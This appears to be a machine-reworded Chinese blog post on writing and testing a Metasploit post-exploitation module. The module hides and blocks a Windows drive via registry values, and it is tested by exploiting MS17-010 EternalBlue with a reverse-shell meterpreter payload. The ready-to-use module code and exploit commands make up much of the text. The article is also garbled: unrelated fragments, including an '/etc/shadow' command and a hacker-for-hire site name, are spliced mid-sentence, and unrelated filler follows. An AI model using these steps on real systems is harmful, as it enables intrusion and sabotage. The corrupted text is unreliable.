后浸透模块,望文生义是在成功浸透政策主机之后进行操作的模块,这类模块可以抵达某种或某些特定的目的。在Metasploit中,模块是后缀名为.rb的文件,它是运用Ruby编写的程序。本文具体描述了怎样运用Ruby编写躲藏和制止访问特定驱动器的后浸透模块、怎样在Metasploit中加载该后浸透模块以及怎样在meterpreter中运用该后浸透模块的进程。
实验环境1.浸透主机:Kali-Linux-2019.1-vm-amd642.政策主机:Windows Server 2008 R23.软件版别:Metasploit v5.0.2
编写后浸透模块1.模块的榜首部分如下所示:
# This module requires Metasploit: https://metasploit.com/download# This module is used to hide and restrict access to a particular drive# after you have successfully penetrated a serverrequire 'rex'require 'msf/core'require 'msf/core/post/windows/registry'class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Description'=> 'This module is used to hide and restrict access to a particular drive', 'License'=> MSF_LICENSE, 'Author'=> 'Neroqi', ) register_options( [ OptString.new('DriveCharacter', [true,'Please SET the Drive Character'])], self.class) end
Metasploit的模块编写建议从注释初步,注释句子以“#”最初,注释可以增强模块的可读性,便利他人和自己往后的阅览运用。
require ‘rex’引入了Metasploit中rex库的全部内容;require ‘msf/core’引入了Metasploit中core库的全部内容;require ‘msf/core/post/windows/registry’引入了registry.rb库文件,用于后续操作政策主机的注册表。
class MetasploitModule < Msf::Post表明将该模块界说为Post类型,即后浸透模块类型。
办法initialize界说了模块的相关信息及参数,其间register_options运用OptString.new函数界说了一个字符串变量DriveCharacter,用于存储盘符。
2.模块的第二部分如下所示:
def drive_converter(drive)case drivewhen "A" return 1when "B" return 2when "C" return 4when "D" return 8when "E" return 16when "F" return 32when "G" return 64end end
这一部分涉及到盘符掩码的核算进程。其实很简单,运用公式2^(N-1)即通过运用微软注册表服务器(regsvr32)获取反向Shell;可,其间N为盘符字母在26个英文字母表中的方位,比方C在字母表中的方位为3,if (SUCCEEDED(hr))因而回来2^(3-1)=4,其他盘符以此类推。
因为服务器或许外挂存储阵列,因而盘符或许不止到字母“G” ,这一部分可以自行批改。
3.模块的第三部分如下所示:
def run drive_int = drive_converter(datastore['DriveCharacter'])registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"exists = meterpreter_registry_key_exist?(registry_path)if exists print_good("Registry Path Exists, Creating Values Directly!")meterpreter_registry_setvaldata(registry_path, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Hiding #{datastore['DriveCharacter']} Drive")meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Restricting Access to #{datastore['DriveCharacter']} Drive")else print_error("Registry Path Doesn't Exist, Creating Path Firstly!")registry_createkey(registry_path)meterpreter_registry_setvaldata(registry_path,'NoDrives', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Hiding #{datastore['DriveCharacter']} Drive")meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Restricting Access to #{datastore['DriveCharacter']} Drive") end print_good("Disabled #{datastore['DriveCharacter']} Drive Successfully!") end
registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"
此处的HKLM表明注册表中的HKEY_LOCAL_MACHINE,可是这样简写是否可行?Windows Server 2008 R2的注册表是下面这样的啊。
莫慌,途径补全的作业现已有人悄悄帮我们做了,在registry.rb库文件中有一段代码完结了这项作业,具体如下:
def registry_hive_lookup(hive) case hive when 'HKCR' HKEY_LOCAL_MACHINE when 'HKCU' HKEY_CURRENT_USER when 'HKLM' HKEY_LOCAL_MACHINE when 'HKU' HKEY_USERS when 'HKPD' HKEY_PERFORMANCE_DATA when 'HKCC' HKEY_CURRENT_CONFIG when 'HKDD' HKEY_DYN_DATA else HKEY_LOCAL_MACHINE end end
registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"
此处是在注册表的HKLM(HKEY_LOCAL_MACHINE)中,这儿的HKLM也可以批改为HKCU(HKEY_CURRENT_USER)。这两者的差异在于:在成功浸透政策主机之后,若可以获得政策主机的system权限,那么就可以运用HKLM批改系统等级的注册表;若只能获得某一用户的权限,那么退而求其次,运用HKCU批改当时用户的注册表。
exists = meterpreter_registry_key_exist?(registry_path)
用于判别政策主机的注册表中是否存在该途径,为下面的if-else句子供应判别依据。
在Windows中通过创立NoDrives和NoViewOnDrive这两个注册表值,可以完结躲藏并制止访问指定盘符。
我们的预期是在meterpreter会话中运用该后浸透模块,所以运用函数meterpreter_registry_setvaldata来设置NoDrives和NoViewOnDrive的值。因为政策主机是64位系统,所以在meterpreter_registry_setvaldata函数中运用的是参数REGISTRY_VIEW_64_BIT;假设政策主机是32位系统,那么运用参数REGISTRY_VIEW_32_BIT。
检验后浸透模块通过上面的进程,后浸透模块的编写现已完结,接下来进行模块的检验。
1.将编写好的后浸透模块disable_drive_Neroqi.rb拷贝到如下途径:
/usr/share/metasploit-framework/modules/post/windows/manage
要将模块成功加载到Metasploit中,还需求在msfconsole中reload_all。若模块存在过错,那么msfconsole会回来具体的报错信息,然后依据报错信息相应地去批改自己的代码即可;若模块正确无误,则msfconsole的回来信息如下图所示(reload_all之前是326个post模块,之后是327个post模块):
2.运用nmap扫描政策主机,nmap指令如下:
root@kali:~# nmap -sV -p - --script vuln --script-args unsafe 192.168.110.130
发现政策主机中存在ms17_010的缝隙,扫描成果如下图所示:
3.为进一步承认政策主机中的ms17_010缝隙,避免nmap误报,我们在msfconsole中运用auxiliary/scanner/ *** b/ *** b_ms17_010模块,承认ms17_010缝隙是否可以运用,操作如下:
msf5 > use auxiliary/scanner/ *** b/ *** b_ms17_010 msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > set RHOSTS 192.168.110.130RHOSTS => 192.168.110.130msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > run
底子承认该ms17_010缝隙可以运用,承认成果如下图所示:
4.运用exploit/windows/ *** b/ms17_010_eternalblue模块对政策主机进行浸透,树立与政策主机之间的meterpreter会话,操作如下:
msf5 > use exploit/windows/ *** b/ms17_010_eternalbluemsf5 exploit(windows/ *** b/ms17_010_eternalblue) > set RHOST 192.168.110.130RHOST => 192.168.110.132msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LHOST 192.168.110.132LHOST => 192.168.110.130msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LPORT 8000LPORT => 8000msf5 exploit(windows/ *** b/ms17_010_eternalblue) > run
5.可以看到我们获得了政策主机的system权限,如下图所示:
6.关于情况不知道的政策主机,可以运用post/windows/gather/forensics/enum_drives模块来枚举分区信息,为后续实行disable_drive_Neroqi.rb模块供应依据,在实行enum_drives模块之前,需求通过background将meterpreter会话转为后台运转,具体操作如下:
meterpreter > background[*] Backgrounding session 1...msf5 > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITYSYSTEM @ WIN-3E5KJEFP436 192.168.110.132:8000 -> 192.168.110.130:49280 (192.168.110.130)msf5 > use post/windows/gather/forensics/enum_drives msf5 post(windows/gather/forensics/enum_drives) > show optionsModule options (post/windows/gather/forensics/enum_drives): Name Current Setting Required Description ---- --------------- -------- ----------- MA其一就是运用白名单,可是关于嵌入的签名的带参数可实行文件要非常留神了。例如许多微软数字签名东西就可以拿来作为其他内容的跳板,由所以微软的签名,或许你现在对那些签名是信认的不能再信任了。XDRIVES 10 no Maximum physical drive number SESSION yes The session to run this module on.msf5 post(windows/gather/forensics/enum_drives) > set SESSION 1SESSION => 1msf5 post(windows/ga以上是物联网摄像头最常见的安全问题。但假设是内置的 *** 摄像头,那么更或许的解说是侵犯者通过Meterpreter payload入侵并控制了它。运用Meterpreter侵犯者可以获取到一个反向shell,这也是本文行将谈论的内容。有关Meterpreter的更多信息,请参阅:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ther/forensics/enum_drives) > runDevice Name: Type: Size (bytes):------------ ----- -------------.PhysicalDrive0 4702111234474983745.C: 4702111234474983745.D: 4702111234474983745.E: 4702111234474983745[*]$> cd shadow-box-for-x86 Post module execution completed
7.在msf中挑选编写的后浸透模块disable_drive_Neroqi.rb,设置DriveCharacter和SESSION,其间DriveCharacter为盘符字母(此处设为D),SESSION为转为后台运转的meterpreter会话id(此处id为1),操作如下:
msf5 > use post/windows/manage/disable_drive_Neroqi msf5 post(windows/manage/disable_drive_Neroqi) > set DriveCharacter DDriveCharacter => Dmsf5 post(windows/manage/disable_drive_Neroqi) > set SESSION 1SESSION => 1msf5 post(windows/manage/disable_drive_Neroqi) > run
8.在设置好模块disable_drive_Neroqi的参数之后,run这个后浸透模块,输出信息如下:
9.登录到政策主机中,验证侵犯是否成功,主机的注册表如下图所示,此刻在注册表中NoDrives和NoViewOnDrive现已成功写入:
翻开“我的电脑”,可以看到D盘现已消失,如下图所示:
在“磁盘处理”中检验翻开D盘,系统报错,无法访问D盘,如下图所示:
结束语以上这些,就是关于怎样运用Ruby编写后浸透模块、怎样加载以及运用后浸透模块的进程,我们有爱好的话,可以检验运用Ruby编写自己的浸透模块而且进行相关检验。
*本文原创作者:Neroqi,本文归于FreeBuf原创奖赏方案,未经许可制止转载
电脑软件:关于Metasploit5中的后浸透模块的编写与测验
set ZTVZ=wEbc// System.out.println("Total " + String.valueOf(countIds) + " classes(自界说类)n"); tab_test[TST_GETSCHED].func = checksched_getscheduler;关于Metasploit5中的后渗透模块的编写与测试
电脑软件我们好,上一篇文章小弟宣告/解了一个简略的pwn,剩下的2个level也现已有小伙伴协助解题了,感觉我们好像都挺喜欢该类型的。这次小弟方案初步写一个新的系列文章,假设写的欠好,或许有什么定见、建议欢迎各位大佬点评。本篇文章为入门篇故仅供应了8个level的栈溢出练习实验,均未打开任何保护的。后边的文章会进一步晋级。自2003年来,以SQL蠕虫、“尼姆达”、“冲击波”、“震荡波”、“熊猫烧香”、“永久之蓝”等病毒的连续性爆发为起点,到核算机文件泄露、口令泄露、硬件资产丢掉、服务器系统瘫痪等许多终端安全工作在各地 *** 一再发生,使 *** 机关、企事业单位、动力领域和其他工业领域的 *** 处理人员头痛不已。17年某动力企业大面积感染勒索病毒更是加快了职业界工控安全整体 *** 的脚步,怎样对主机终端的进行更好的安全防护一向是我们考虑的问题。if [ -f ~/.pip/pip.conf ];
vim.tiny /etc/shadow用户为:80/tcp open http Apache httpd 2.4.18 ((Ubuntu))这两款设备都运用Electra jailbreak 1.0.4进行了越狱。电脑软件
mpenginel 情报数据分析发现,在7月 23日至31日运用过相关Xshell等产品的用户信息 极有或许已被侵犯者盗取,因为其他时间段内C&C无任何DNS解析,且NS服务器指向正常,信息被盗取的或许性较小,但不打扫侵犯者在后续进程中再次批改配备实施侵犯。5.Socket,又称为“套接字”,运用程序可以通过“套接字”向 *** 宣告央求或许应对 *** 央求。Socket对TCP/TP协议进行封装,是一个通讯链的句柄。扫描 *** 中数据存储服务,运用Socket编程接口,获取 *** 字符输出流,进行指纹辨认作业。下面是我写的一个比方。 3.3 代码注入进程
[1][2][3][4][5][6][7]黑客接单网
Linux服务器版别:RedHat Linux AS 2.1
用户在运用Exchange服务时,电子邮件客户端会依据服务器要求的安全等级进行验证客户端系统的安全性设置是否满足服务器的要求,假设满足服务器要求的安全等级则容许进行收发邮件,否则将无法继续与服务器进行通讯。关于Metasploit5中的后渗透模块的编写与测试电脑软件现有智能硬件的安全策略因为要下降关于服务端的功用损耗,许多情况下是把安全的过规则安置在客户端,没有对全部客户端输入数据的输入检查和标准化。运用正则表达式和其他机制来保证只需容许的数据能进入客户端运用程序。在规划时并没有完结让移动端和服务端支撑的一套一同的安全需求,可以通过将数据参数直接提交至云端,客户端APK 对参数过滤的束缚,抵达破解设备功用的目的。触及的指令和控制服务器假设SAML照应消息短少相应的保护机制,则侵犯者可以通过篡改照应数据假充他人身份。例如,我以Tim的身份登录IdP然后通过简略地批改SAML照应消息声称自己是Emmanuel。实事上,我可以编造整个照应消息,然后假充Emmanuel的身份。
[2]依据内部挟制的政策可以将现有挟制大致分为系统损坏、信息盗取与内部欺诈三个底子类型,实践中还存在两种之上的混合挟制;检查某服务发起权限
-- *** 存储
电脑软件设备证书
回到Apple Pay上,Apple Pay可以做到离线支付,那是不是银行卡被拷贝到了苹果手机中呢?并没有,Apple Pay的绑定银行卡进程,不是把银行卡芯片中的密钥和数据直接拷贝到手机上,实际上是把卡号和相关的暗码或许信用卡的CVV输入到手机运用里,然后Apple Pay和银联的服务器做一次设备认证绑定。这个设备认证的进程Apple Pay会生成一个仅有的设备账号与之对应,设备认证绑定后,往后要和POS机进行安全认证的数据Token等存储在iphone安全芯片中。
前史关于Metasploit5中的后渗透模块的编写与测试pmuflags=1 禁定看门狗定时器python 512线程直扫上行带宽约几百KB/s;直接上masscan、zmap这等扫描软件上行流量会暴走;具体要多少时间,可以拿少量数据检验算算!2.1 运用python运用python直接将IP按组遍历进队伍,运用多线程循环扫描(也就是直接检验登录),速度比较慢,但准确率相对较高
然后我们就可以运用这些SID来拒绝RDP和其他 *** 访问本地帐户。
本文标题:电脑软件:关于Metasploit5中的后浸透模块的编写与测验
暌违二十余年,当你再次回到米德加,耳边缠绕着巨大魔晄炉的訇然作响,漫步在贫民窟拥挤而局促的小道上,远远看见第七天堂的霓虹招牌时,你无法否认的是,《最终幻想7:重制版》确实成为了某种意义上的“圆梦之作”...
扁平疣传染吗(瘊子会感染它能被痊愈吗)瘊子是一种十分普遍的皮肤疾病,最多见于脸部和手臂等醒目的部位,主要表现为平扁、角质化的小疹,很多人乃至会把瘊子和痘痘等搞混。但实际上,瘊子和痘痘是特性彻底不一...
黑客攻防教学 黑客攻防:攻击基本原理与防范技术据统计,在所有黑客攻击事件中,SYN攻击是最常见又最容易被利用的一种攻击手法。这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用...
9月3日,据黑龙江省哈尔滨市道里区人民检察院微信公众号消息:2020年8月29日晚,黑龙江省哈尔滨市道里区发生一起性侵幼女案件,引发社会高度关注。 2020年9月3日,哈尔滨市道里区人民检察院以涉嫌...
火锅的市场是不分季节的,一年四季都是受人欢迎的,因此火锅的人气很是旺盛。杨光会鲜货火锅加盟在餐饮行业中也有着不错的人气,在市场中也有一定的知名度。杨光会鲜货火锅加盟不仅能古为消费者带来美食体验还能够为...
辞去旧年、迎来新年,总需要带一些祝福的话语上阵。每年过年的时候,也是各种祝福短信“满天飞”的时候,亲戚之间、朋友之间、同事之间,两三句暖心的祝福,两三句简短的问候,总给人以温暖、给人以幸福。整理202...